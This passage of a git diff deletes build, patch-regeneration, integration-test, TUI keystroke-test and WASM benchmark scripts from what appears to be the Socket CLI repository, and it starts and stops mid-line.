logger.log('') - } - - if (results.length > 1) { - const totalSavings = ((totalBefore - totalAfter) / totalBefore * 100).toFixed(1) - logger.log(' Total:') - logger.log(` Before: ${totalBefore.toFixed(2)} MB`) - logger.log(` After: ${totalAfter.toFixed(2)} MB`) - logger.log(` Saved: ${(totalBefore - totalAfter).toFixed(2)} MB (${totalSavings}%)`) - } - - logger.log(`\n${colors.green('✓')} All optimizations complete!`) - } -} - -main().catch(error => { - logger.error(`\n${colors.red('✗')} Optimization failed:`, error.message) - process.exit(1) -}) diff --git a/scripts/regenerate-node-patches.mjs b/scripts/regenerate-node-patches.mjs deleted file mode 100644 index 1ca026734..000000000 --- a/scripts/regenerate-node-patches.mjs +++ /dev/null @@ -1,284 +0,0 @@ -/** - * @fileoverview Regenerate Socket Node.js patches for new Node.js versions - * - * This script automates the process of regenerating patches when Node.js - * version is bumped (e.g., from v24.9.0 to v24.10.0). - * - * Process: - * 1. Clone fresh Node.js at specified version - * 2. Apply Socket modifications - * 3. Generate patches from diff - * - * Usage: - * node scripts/regenerate-node-patches.mjs --version v24.10.0 - */ - -import { existsSync } from 'node:fs' -import { mkdir, readFile, rm, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--version=')) -if (!versionArg) { - logger.error(`${colors.red('✗')} Missing --version argument`) - logger.error( - 'Usage: node scripts/regenerate-node-patches.mjs --version=v24.10.0', - ) - process.exit(1) -} - -const NODE_VERSION = versionArg.split('=')[1] -if (!NODE_VERSION.startsWith('v')) { - logger.error(`${colors.red('✗')} Version must start with "v" (e.g., v24.10.0)`) - process.exit(1) -} - -const ROOT_DIR = join(__dirname, '..') -const WORK_DIR = join(ROOT_DIR, '.patch-gen') -const NODE_DIR = join(WORK_DIR, 'node') -const OUTPUT_DIR = join(ROOT_DIR, 'build', 'patches') - -/** - * Execute a command - */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd(), stdio = 'inherit' } = options - - logger.log(`$ ${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - stdio, - shell: false, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with exit code ${result.code}`) - } - - return result -} - -/** - * Execute and capture output - */ -async function execCapture(command, args = [], options = {}) { - const { cwd = process.cwd() } = options - - const result = await spawn(command, args, { - cwd, - stdio: 'pipe', - shell: false, - }) - - if (result.code !== 0) { - throw new Error( - `Command failed with exit code ${result.code}: ${result.stderr}`, - ) - } - - return result.stdout.trim() -} - -/** - * Apply Socket modifications - */ -async function applySocketModifications() { - logger.log('🔧 Applying Socket modifications...') - - // Fix 1: V8 include paths - const v8Fixes = [ - { - file: 'deps/v8/src/ast/ast-value-factory.h', - from: '#include "src/base/hashmap.h"', - to: '#include "base/hashmap.h"', - }, - { - file: 'deps/v8/src/heap/new-spaces-inl.h', - from: '#include "src/heap/spaces-inl.h"', - to: '#include "heap/spaces-inl.h"', - }, - { - file: 'deps/v8/src/heap/factory-inl.h', - from: '#include "src/heap/factory-base-inl.h"', - to: '#include "heap/factory-base-inl.h"', - }, - { - file: 'deps/v8/src/objects/js-objects-inl.h', - from: '#include "src/objects/hash-table-inl.h"', - to: '#include "objects/hash-table-inl.h"', - }, - { - file: 'deps/v8/src/heap/cppgc/heap-page.h', - from: '#include "src/base/iterator.h"', - to: '#include "base/iterator.h"', - }, - ] - - for (const { file, from, to } of v8Fixes) { - const filePath = join(NODE_DIR, file) - try { - let content = await readFile(filePath, 'utf8') - if (content.includes(from)) { - content = content.replace(from, to) - await writeFile(filePath, content, 'utf8') - logger.log(` ✓ Fixed: ${file}`) - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Skipped ${file}: ${e.message}`) - } - } - - // Fix 2: Enable SEA for pkg binaries - const seaFile = join(NODE_DIR, 'lib', 'sea.js') - try { - let content = await readFile(seaFile, 'utf8') - const oldImport = - "const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');" - const newImport = `const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');` - - if (content.includes(oldImport)) { - content = content.replace(oldImport, newImport) - await writeFile(seaFile, content, 'utf8') - logger.log(' ✓ Modified: lib/sea.js') - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Skipped lib/sea.js: ${e.message}`) - } - - logger.log(`${colors.green('✓')} Socket modifications applied`) - logger.log('') -} - -/** - * Generate patch file - */ -async function generatePatch(name, description) { - logger.log(`📝 Generating ${name} patch...`) - - const diff = await execCapture('git', ['diff', 'HEAD'], { cwd: NODE_DIR }) - - if (!diff) { - logger.log(' ℹ️ No changes to generate patch') - return null - } - - const header = `# ${description} -# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node version: ${NODE_VERSION} - -` - - const patchContent = header + diff - const patchFile = join( - OUTPUT_DIR, - `${name}-${NODE_VERSION.replace(/\./g, '-')}.patch`, - ) - - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Main function - */ -async function main() { - logger.log(`🔨 Regenerating Socket patches for Node.js ${NODE_VERSION}`) - logger.log('') - - // Clean up old work directory - if (existsSync(WORK_DIR)) { - logger.log('🧹 Cleaning up old work directory...') - await rm(WORK_DIR, { recursive: true, force: true }) - } - - await mkdir(WORK_DIR, { recursive: true }) - await mkdir(OUTPUT_DIR, { recursive: true }) - - // Step 1: Clone Node.js - logger.log(`📥 Cloning Node.js ${NODE_VERSION}...`) - await exec( - 'git', - [ - 'clone', - '--depth', - '1', - '--branch', - NODE_VERSION, - 'https://github.com/nodejs/node.git', - 'node', - ], - { cwd: WORK_DIR }, - ) - logger.log('') - - // Step 2: Apply Socket modifications - await applySocketModifications() - - // Step 5: Generate patches - logger.log('📝 Generating patch files...') - logger.log('') - - const patches = [] - - // Generate combined patch - const combinedPatch = await generatePatch( - 'socket-node-modifications', - 'Socket CLI modifications for Node.js\n' + - '#\n' + - '# Includes:\n' + - '# - Fix V8 include paths\n' + - '# - Enable SEA detection for pkg binaries', - ) - - if (combinedPatch) { - patches.push(combinedPatch) - } - - logger.log('') - logger.log('🎉 Patch regeneration complete!') - logger.log('') - - if (patches.length > 0) { - logger.log('Generated patches:') - for (const patch of patches) { - logger.log(` - ${patch}`) - } - logger.log('') - logger.log('📝 Next steps:') - logger.log(' 1. Review the generated patches') - logger.log( - ' 2. Update packages/node-smol-builder/scripts/build.mjs to use new patch files', - ) - logger.log(' 3. Update SOCKET_PATCHES array with new filenames') - logger.log(' 4. Test the build') - } else { - logger.log(`${colors.yellow('⚠')} No patches were generated (no changes detected)`) - } - - logger.log('') - logger.log('🧹 Cleanup:') - logger.log(` rm -rf ${WORK_DIR}`) -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Patch regeneration failed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/register.mjs b/scripts/register.mjs deleted file mode 100644 index 4d4e0d700..000000000 --- a/scripts/register.mjs +++ /dev/null @@ -1,21 +0,0 @@ -/** - * Module loader registration for Node.js --import flag. - * - * Registers our custom alias loader for @socketsecurity/* package imports. - * This replaces the deprecated --loader flag with the new register() API. - * - * Usage: - * node --import=./scripts/register.mjs script.mjs - * - * Compatible with Node.js 18.19+, 20.6+, and 22+ - */ - -import { register } from 'node:module' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -// Register the alias loader using absolute path. - -register(path.join(__dirname, 'utils', 'alias-loader.mjs'), import.meta.url) diff --git a/scripts/test-recording.sh b/scripts/test-recording.sh deleted file mode 100644 index 69e7eae5c..000000000 --- a/scripts/test-recording.sh +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/bash -# Script to record terminal session testing the TUI demo. -# This will create a typescript file showing the exact behavior. - -SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" - -echo "=== Starting TUI Demo Test Recording ===" -echo "This will record:" -echo "1. Initial state (1 line textarea)" -echo "2. Pressing Ctrl+N multiple times to expand" -echo "3. Pressing Enter to collapse" -echo "4. Repeating the cycle to observe garbling" -echo "" -echo "Recording will be saved to: /tmp/tui-test-recording.txt" -echo "" -echo "Starting in 3 seconds..." -sleep 3 - -# Use script to record the session. -script -q /tmp/tui-test-recording.txt << EOF -# Run the demo. -node "$SCRIPT_DIR/demo-final-tui.mjs" - -# The demo will start... -# I'll send keystrokes programmatically to simulate the test: -# - Wait 2 seconds -# - Send Ctrl+N (expand) 5 times -# - Wait 1 second -# - Send Enter (collapse) -# - Wait 1 second -# - Send Ctrl+N 5 times again -# - Wait 1 second -# - Send Enter -# - Wait 1 second -# - Send Ctrl+C to exit - -EOF - -echo "" -echo "=== Recording complete ===" -echo "View with: cat /tmp/tui-test-recording.txt" diff --git a/scripts/test-smol-integration.mjs b/scripts/test-smol-integration.mjs deleted file mode 100644 index 8845d91c4..000000000 --- a/scripts/test-smol-integration.mjs +++ /dev/null @@ -1,329 +0,0 @@ -/** - * @fileoverview End-to-end integration test for smol Node.js binary - * - * This script performs a complete end-to-end test: - * 1. Builds Socket CLI with the custom Node.js binary - * 2. Creates a pkg executable - * 3. Tests the executable works correctly - * 4. Verifies SEA detection - * 5. Cleans up test artifacts - * - * Usage: - * node scripts/test-smol-integration.mjs [--node-version v24.10.0] - */ - -import { existsSync } from 'node:fs' -import { mkdir, rm, writeFile } from 'node:fs/promises' -import { tmpdir } from 'node:os' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments. -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--node-version=')) -const NODE_VERSION = versionArg ? versionArg.split('=')[1] : 'v24.10.0' - -const ROOT_DIR = join(__dirname, '..') -const TEST_DIR = join(tmpdir(), `socket-cli-integration-test-${Date.now()}`) - -/** - * Execute a command and capture output. - */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd(), env = process.env } = options - - logger.log(`$ ${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - env, - stdio: 'pipe', - shell: false, - }) - - return { - code: result.code, - stdout: result.stdout.trim(), - stderr: result.stderr.trim(), - } -} - -/** - * Main test function. - */ -async function main() { - logger.log('') - logger.log('🧪 Socket CLI - Smol Integration Test') - logger.log(` Testing Node.js ${NODE_VERSION} binary with pkg`) - logger.log('') - - let testsFailed = 0 - const testResults = [] - - try { - // Test 1: Verify custom Node.js binary exists in cache. - logger.log('━'.repeat(60)) - logger.log('TEST 1: Custom Node.js Binary in Cache') - logger.log('━'.repeat(60)) - logger.log('') - - const platform = process.platform - const arch = process.arch - const isMacOS = platform === 'darwin' - const targetName = `built-${NODE_VERSION}-${platform}-${arch}${isMacOS && arch === 'arm64' ? '-signed' : ''}` - const binaryPath = join( - process.env.HOME || process.env.USERPROFILE, - '.pkg-cache', - 'v3.5', - targetName, - ) - - if (!existsSync(binaryPath)) { - logger.error(`${colors.red('✗')} Custom Node.js binary not found: ${binaryPath}`) - logger.error(' Run: node packages/node-smol-builder/scripts/build.mjs') - testsFailed++ - testResults.push({ name: 'Binary in cache', passed: false }) - } else { - logger.log(`${colors.green('✓')} Custom Node.js binary found: ${binaryPath}`) - testResults.push({ name: 'Binary in cache', passed: true }) - } - - logger.log('') - - // Test 2: Build Socket CLI. - logger.log('━'.repeat(60)) - logger.log('TEST 2: Build Socket CLI') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Building Socket CLI distribution...') - const buildResult = await exec('pnpm', ['run', 'build:cli'], { - cwd: ROOT_DIR, - }) - - if (buildResult.code !== 0) { - logger.error(`${colors.red('✗')} Socket CLI build failed`) - logger.error(buildResult.stderr) - testsFailed++ - testResults.push({ name: 'Build Socket CLI', passed: false }) - throw new Error('Socket CLI build failed') - } - - logger.log(`${colors.green('✓')} Socket CLI built successfully`) - testResults.push({ name: 'Build Socket CLI', passed: true }) - logger.log('') - - // Test 3: Create test directory. - logger.log('━'.repeat(60)) - logger.log('TEST 3: Setup Test Environment') - logger.log('━'.repeat(60)) - logger.log('') - - await mkdir(TEST_DIR, { recursive: true }) - logger.log(`Created test directory: ${TEST_DIR}`) - - // Create minimal test package.json. - const testPackageJson = { - name: 'socket-cli-test', - version: '1.0.0', - main: 'test-cli.js', - bin: { - 'socket-test': 'test-cli.js', - }, - } - - await writeFile( - join(TEST_DIR, 'package.json'), - JSON.stringify(testPackageJson, null, 2), - ) - - // Create test CLI script. - const testCliScript = `#!/usr/bin/env node -const sea = require('node:sea'); -const fs = require('node:fs'); -const path = require('node:path'); - -// Test 1: Basic execution. -logger.log('Test executable running!'); - -// Test 2: SEA detection. -const isSea = sea.isSea(); -logger.log('SEA detection:', isSea ? 'YES' : 'NO'); - -// Test 3: File system access. -const cwd = process.cwd(); -logger.log('CWD:', cwd); - -// Test 4: Module loading. -const pathModule = require('node:path'); -logger.log('Path module:', pathModule ? 'OK' : 'FAIL'); - -// Exit with appropriate code. -if (isSea) { - logger.log(`${colors.green('✓')} All tests passed`); - process.exit(0); -} else { - logger.error(`${colors.red('✗')} SEA detection failed`); - process.exit(1); -} -` - - await writeFile(join(TEST_DIR, 'test-cli.js'), testCliScript) - logger.log(`${colors.green('✓')} Test environment setup complete`) - testResults.push({ name: 'Setup test environment', passed: true }) - logger.log('') - - // Test 4: Create pkg executable. - logger.log('━'.repeat(60)) - logger.log('TEST 4: Create pkg Executable') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Running pkg to create executable...') - logger.log(`Using custom Node.js binary: ${targetName}`) - logger.log('') - - const pkgResult = await exec( - 'pnpm', - [ - 'exec', - 'pkg', - '.', - '--targets', - `node24-${platform}-${arch}`, - '--output', - 'socket-test', - ], - { - cwd: TEST_DIR, - }, - ) - - if (pkgResult.code !== 0) { - logger.error(`${colors.red('✗')} pkg failed to create executable`) - logger.error(pkgResult.stderr) - testsFailed++ - testResults.push({ name: 'Create pkg executable', passed: false }) - throw new Error('pkg failed') - } - - const executablePath = join( - TEST_DIR, - `socket-test${platform === 'win32' ? '.exe' : ''}`, - ) - if (!existsSync(executablePath)) { - logger.error(`${colors.red('✗')} Executable not created: ${executablePath}`) - testsFailed++ - testResults.push({ name: 'Create pkg executable', passed: false }) - throw new Error('Executable not created') - } - - logger.log(`${colors.green('✓')} Executable created: ${executablePath}`) - testResults.push({ name: 'Create pkg executable', passed: true }) - logger.log('') - - // Test 5: Run the executable. - logger.log('━'.repeat(60)) - logger.log('TEST 5: Run and Verify Executable') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log('Executing test binary...') - logger.log('') - - const execResult = await exec(executablePath, [], { - cwd: TEST_DIR, - }) - - logger.log('Output:') - logger.log(execResult.stdout) - logger.log('') - - if (execResult.code !== 0) { - logger.error(`${colors.red('✗')} Executable failed with exit code:`, execResult.code) - logger.error('STDERR:', execResult.stderr) - testsFailed++ - testResults.push({ name: 'Run executable', passed: false }) - testResults.push({ name: 'SEA detection', passed: false }) - } else { - logger.log(`${colors.green('✓')} Executable ran successfully`) - testResults.push({ name: 'Run executable', passed: true }) - - // Verify SEA detection. - if (execResult.stdout.includes('SEA detection: YES')) { - logger.log(`${colors.green('✓')} SEA detection working correctly`) - testResults.push({ name: 'SEA detection', passed: true }) - } else { - logger.error(`${colors.red('✗')} SEA detection failed (reported as NO)`) - testsFailed++ - testResults.push({ name: 'SEA detection', passed: false }) - } - } - - logger.log('') - - // Summary. - logger.log('━'.repeat(60)) - logger.log('TEST SUMMARY') - logger.log('━'.repeat(60)) - logger.log('') - - for (const { name, passed } of testResults) { - logger.log(`${passed ? `${colors.green('✓')}` : `${colors.red('✗')}`} ${name}`) - } - - logger.log('') - - if (testsFailed === 0) { - logger.log('🎉 ALL TESTS PASSED') - logger.log('') - logger.log('Your custom Node.js binary is working correctly with pkg!') - logger.log('') - } else { - logger.error(`${colors.red('✗')} ${testsFailed} TEST(S) FAILED`) - logger.error() - logger.error('The custom Node.js binary has issues.') - logger.error('Review the errors above and rebuild:') - logger.error(' node packages/node-smol-builder/scripts/build.mjs --clean') - logger.error() - process.exitCode = 1 - } - logger.error() - } catch (e) { - logger.error(`${colors.red('✗')} Integration test failed:`, e.message) - logger.error() - process.exitCode = 1 - } finally { - // Cleanup. - logger.log('━'.repeat(60)) - logger.log('CLEANUP') - logger.log('━'.repeat(60)) - logger.log('') - - logger.log(`Removing test directory: ${TEST_DIR}`) - try { - await rm(TEST_DIR, { recursive: true, force: true }) - logger.log(`${colors.green('✓')} Test directory cleaned up`) - } catch (e) { - logger.warn(`${colors.yellow('⚠')} Could not clean up test directory: ${e.message}`) - logger.warn(` Manually remove: rm -rf ${TEST_DIR}`) - } - - logger.log('') - } -} - -// Run main function. -main().catch(error => { - logger.error(`${colors.red('✗')} Integration test crashed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/test-tui-automated.sh b/scripts/test-tui-automated.sh deleted file mode 100755 index e73e41b39..000000000 --- a/scripts/test-tui-automated.sh +++ /dev/null @@ -1,75 +0,0 @@ -#!/bin/bash -# Automated TUI test script that can be recorded. -# This sends keystrokes to the demo to demonstrate the fix. - -echo "=== TUI Demo Test - Automated ===" -echo "" -echo "This will demonstrate:" -echo " 1. Initial state (1 line textarea)" -echo " 2. Expand textarea (Ctrl+N x5)" -echo " 3. Collapse textarea (Enter)" -echo " 4. Repeat cycle" -echo "" -echo "Starting demo in 2 seconds..." -sleep 2 - -# Create a FIFO to send commands. -FIFO="/tmp/tui-test-fifo-$$" -mkfifo "$FIFO" - -# Start the demo in the background, reading from the FIFO. -node scripts/load.mjs demo-final-tui < "$FIFO" & -DEMO_PID=$! - -# Give it time to initialize. -sleep 2 - -# Function to send keys to the FIFO. -send_key() { - printf "$1" > "$FIFO" -} - -# Test sequence. -echo "[TEST] Expanding textarea with Ctrl+N (5 times)..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Collapsing with Enter..." -send_key $'\r' # Enter -sleep 1 - -echo "[TEST] Expanding again with Ctrl+N (5 times)..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Collapsing with Enter..." -send_key $'\r' # Enter -sleep 1 - -echo "[TEST] One more expand cycle..." -for i in {1..5}; do - send_key $'\x0E' # Ctrl+N - sleep 0.3 -done - -sleep 1 -echo "[TEST] Final collapse..." -send_key $'\r' # Enter -sleep 2 - -echo "[TEST] Exiting with q..." -send_key 'q' -sleep 1 - -# Cleanup. -rm -f "$FIFO" -wait "$DEMO_PID" 2>/dev/null || true - -echo "" -echo "=== Test Complete ===" diff --git a/scripts/test-tui-expect.exp b/scripts/test-tui-expect.exp deleted file mode 100755 index fca85438f..000000000 --- a/scripts/test-tui-expect.exp +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/expect -f -# Expect script to interact with the TUI demo and verify the fix. - -set timeout 30 - -# Start the demo. -spawn node scripts/load.mjs demo-final-tui - -# Wait for initialization. -sleep 2 - -puts "\n=== TEST START ===" -puts "Initial state: 1 line textarea" -sleep 1 - -# Cycle 1: Expand. -puts "\n\[TEST\] Expanding textarea (Ctrl+N x5)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -puts "\[TEST\] Textarea expanded to 6 lines" -sleep 1 - -# Cycle 1: Collapse. -puts "\n\[TEST\] Collapsing textarea (Enter)..." -send "\r" -sleep 1 - -puts "\[TEST\] Textarea collapsed back to 1 line" -puts "\[TEST\] Checking for garbling artifacts..." -sleep 1 - -# Cycle 2: Expand again. -puts "\n\[TEST\] Second expand cycle (Ctrl+N x5)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -sleep 1 - -# Cycle 2: Collapse. -puts "\n\[TEST\] Second collapse (Enter)..." -send "\r" -sleep 1 - -puts "\[TEST\] Checking for jumping garbling..." -sleep 1 - -# Cycle 3: One more time to be sure. -puts "\n\[TEST\] Third expand cycle (Ctrl+N x7)..." -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 -send "\x0E" -sleep 0.3 - -sleep 1 - -puts "\n\[TEST\] Third collapse (Enter)..." -send "\r" -sleep 2 - -puts "\n=== TEST COMPLETE ===" -puts "If no garbling was visible, the fix is working!" -sleep 1 - -# Exit. -puts "\n\[TEST\] Exiting (q)..." -send "q" - -expect eof diff --git a/scripts/test-tui-with-snapshots.exp b/scripts/test-tui-with-snapshots.exp deleted file mode 100755 index 7e241d704..000000000 --- a/scripts/test-tui-with-snapshots.exp +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/expect -f -# Test script that takes snapshots at key moments. - -set timeout 30 -log_user 1 - -# Start the demo. -spawn node scripts/load.mjs demo-final-tui - -# Wait for initialization. -sleep 3 - -puts "\n\[SNAPSHOT 1\] Initial state - 1 line textarea" -# Take snapshot. -send "" -expect * -sleep 1 - -# Expand. -puts "\n\[ACTION\] Expanding with Ctrl+N x5..." -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 1 - -puts "\n\[SNAPSHOT 2\] After expansion - 6 line textarea" -send "" -expect * -sleep 1 - -# Collapse. -puts "\n\[ACTION\] Collapsing with Enter..." -send "\r" -sleep 2 - -puts "\n\[SNAPSHOT 3\] After collapse - checking for garbling" -send "" -expect * -sleep 1 - -# Expand again. -puts "\n\[ACTION\] Expanding again with Ctrl+N x5..." -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 0.5 -send "\x0E" -sleep 1 - -puts "\n\[SNAPSHOT 4\] Second expansion" -send "" -expect * -sleep 1 - -# Collapse again. -puts "\n\[ACTION\] Collapsing again with Enter..." -send "\r" -sleep 2 - -puts "\n\[SNAPSHOT 5\] Second collapse - checking for jumping garbling" -send "" -expect * -sleep 2 - -puts "\n\n=== TEST SUMMARY ===" -puts "The test completed 2 expand/collapse cycles." -puts "If no garbling was visible in the snapshots, the fix is working!" - -# Exit. -send "q" -sleep 1 - -expect eof diff --git a/scripts/wasm/benchmark-build.mjs b/scripts/wasm/benchmark-build.mjs deleted file mode 100644 index 67cc5c25e..000000000 --- a/scripts/wasm/benchmark-build.mjs +++ /dev/null @@ -1,225 +0,0 @@ -/** - * Benchmark WASM Build Performance - * - * Measures and compares build times for dev vs production builds. - * Helps validate optimization improvements. - * - * USAGE: - * node scripts/wasm/benchmark-build.mjs - * node scripts/wasm/benchmark-build.mjs --dev-only - * node scripts/wasm/benchmark-build.mjs --prod-only - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { performance } from 'node:perf_hooks' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const buildScript = path.join(__dirname, 'build-unified-wasm.mjs') - -/** - * Format time duration. - */ -function formatTime(ms) { - const seconds = Math.floor(ms / 1000) - const minutes = Math.floor(seconds / 60) - const remainingSeconds = seconds % 60 - - if (minutes > 0) { - return `${minutes}m ${remainingSeconds}s` - } - return `${seconds}s` -} - -/** - * Get file size. - */ -async function getFileSize(filePath) { - if (!existsSync(filePath)) { - return 0 - } - const stats = await fs.stat(filePath) - return stats.size -} - -/** - * Run build and measure time. - */ -async function benchmarkBuild(mode) { - logger.step(`Benchmarking ${mode} build`) - - const args = ['node', buildScript] - if (mode === 'dev') { - args.push('--dev') - } - - const startTime = performance.now() - - try { - const result = await spawn(args[0], args.slice(1), { - stdio: 'inherit', - stdioString: true, - }) - - if (result.code !== 0) { - throw new Error(`Build failed with exit code ${result.code}`) - } - } catch (e) { - logger.error(`${mode} build failed:`, e.message) - return null - } - - const endTime = performance.now() - const duration = endTime - startTime - - logger.success(`${mode} build completed in ${formatTime(duration)}`) - - return { - duration, - durationMs: duration, - durationFormatted: formatTime(duration), - mode, - } -} - -/** - * Get WASM file sizes. - */ -async function getWasmSizes() { - const rootPath = path.join(__dirname, '../..') - const wasmFile = path.join( - rootPath, - 'build/wasm-bundle/pkg/socket_ai_bg.wasm', - ) - const syncFile = path.join(rootPath, 'external/socket-ai-sync.mjs') - - const wasmSize = await getFileSize(wasmFile) - const syncSize = await getFileSize(syncFile) - - return { - syncSize, - wasmSize, - } -} - -/** - * Display comparison. - */ -function displayComparison(devResult, prodResult) { - logger.step('Build Performance Comparison') - - logger.log('') - logger.log('╔════════════════════════════════════════════════════╗') - logger.log('║ Build Time Comparison ║') - logger.log('╚════════════════════════════════════════════════════╝') - logger.log('') - - const devTime = devResult.durationMs / 1000 - const prodTime = prodResult.durationMs / 1000 - const speedup = (prodTime / devTime).toFixed(1) - - logger.log(` Dev Build: ${devResult.durationFormatted}`) - logger.log(` Prod Build: ${prodResult.durationFormatted}`) - logger.log('') - logger.log(` Speedup: ${speedup}x faster (dev vs prod)`) - logger.log('') - - // Visualization. - const maxBar = 50 - const devBar = Math.floor((devTime / prodTime) * maxBar) - const prodBar = maxBar - - logger.log(' Dev │' + '█'.repeat(devBar)) - logger.log(' Prod │' + '█'.repeat(prodBar)) - logger.log('') -} - -/** - * Display size information. - */ -async function displaySizes() { - const sizes = await getWasmSizes() - - if (sizes.wasmSize === 0 || sizes.syncSize === 0) { - logger.warn('Could not read WASM file sizes') - return - } - - logger.log('╔════════════════════════════════════════════════════╗') - logger.log('║ Output Size Information ║') - logger.log('╚════════════════════════════════════════════════════╝') - logger.log('') - - const wasmMB = (sizes.wasmSize / 1024 / 1024).toFixed(2) - const syncMB = (sizes.syncSize / 1024 / 1024).toFixed(2) - const compressionRatio = ( - (sizes.syncSize / sizes.wasmSize) * - 100 - ).toFixed(1) - - logger.log(` WASM (raw): ${wasmMB} MB`) - logger.log(` JS (compressed): ${syncMB} MB`) - logger.log(` Compression: ${compressionRatio}% of original`) - logger.log('') -} - -/** - * Main entry point. - */ -async function main() { - const args = process.argv.slice(2) - const devOnly = args.includes('--dev-only') - const prodOnly = args.includes('--prod-only') - - logger.info('╔════════════════════════════════════════════════════╗') - logger.info('║ WASM Build Performance Benchmark ║') - logger.info('╚════════════════════════════════════════════════════╝\n') - - let devResult = null - let prodResult = null - - // Run dev build. - if (!prodOnly) { - devResult = await benchmarkBuild('dev') - if (!devResult) { - process.exit(1) - } - } - - // Run prod build. - if (!devOnly) { - if (devResult) { - logger.log('') // Spacing. - } - prodResult = await benchmarkBuild('production') - if (!prodResult) { - process.exit(1) - } - } - - // Display comparison. - logger.log('') - if (devResult && prodResult) { - displayComparison(devResult, prodResult) - } else if (devResult) { - logger.success(`Dev build: ${devResult.durationFormatted}`) - } else if (prodResult) { - logger.success(`Production build: ${prodResult.durationFormatted}`) - } - - // Display sizes. - await displaySizes() - - logger.info('Benchmark complete') -} - -main().catch(e => { - logger.error('Benchmark failed:', e) - process.exit(1) -}) diff --git a/scripts/wasm/build-model-packages.mjs b/scripts/wasm/build-model-packages.mjs deleted file mode 100755 index 4ff84ea0c..000000000 --- a/scripts/wasm/build-model-packages.mjs +++ /dev/null @@ -1,192 +0,0 @@ -#!/usr/bin/env node -/** - * Build separate WASM model packages for npm distribution. - * - * Builds individual WASM binaries for each model: - * - minilm.wasm (~17 MB) - MiniLM embeddings only - * - codet5.wasm (~90 MB) - CodeT5 code analysis only - * - * Usage: - * node scripts/wasm/build-model-packages.mjs [options] - * - * Options: - * --clean Clean build directories before building - * --no-optimize Skip wasm-opt optimization - * --help Show this help message - */ - -import { execSync } from 'node:child_process' -import { existsSync, mkdirSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const wasmBundlePath = path.join(rootPath, 'packages/node-smol-builder/wasm-bundle') -const packagesPath = path.join(rootPath, 'packages') - -// Parse command line arguments. -const args = process.argv.slice(2) -const clean = args.includes('--clean') -const noOptimize = args.includes('--no-optimize') -const help = args.includes('--help') - -if (help) { - logger.log(` -Build WASM Model Packages - -Usage: node scripts/wasm/build-model-packages.mjs [options] - -Options: - --clean Clean build directories before building - --no-optimize Skip wasm-opt optimization - --help Show this help message - -Examples: - node scripts/wasm/build-model-packages.mjs # Build both packages - node scripts/wasm/build-model-packages.mjs --clean # Clean and rebuild -`) - process.exit(0) -} - -function exec(command, options = {}) { - logger.log(`$ ${command}`) - return execSync(command, { - cwd: options.cwd || wasmBundlePath, - stdio: 'inherit', - ...options, - }) -} - -async function getFileSizeMB(filePath) { - const stats = await fs.stat(filePath) - return (stats.size / 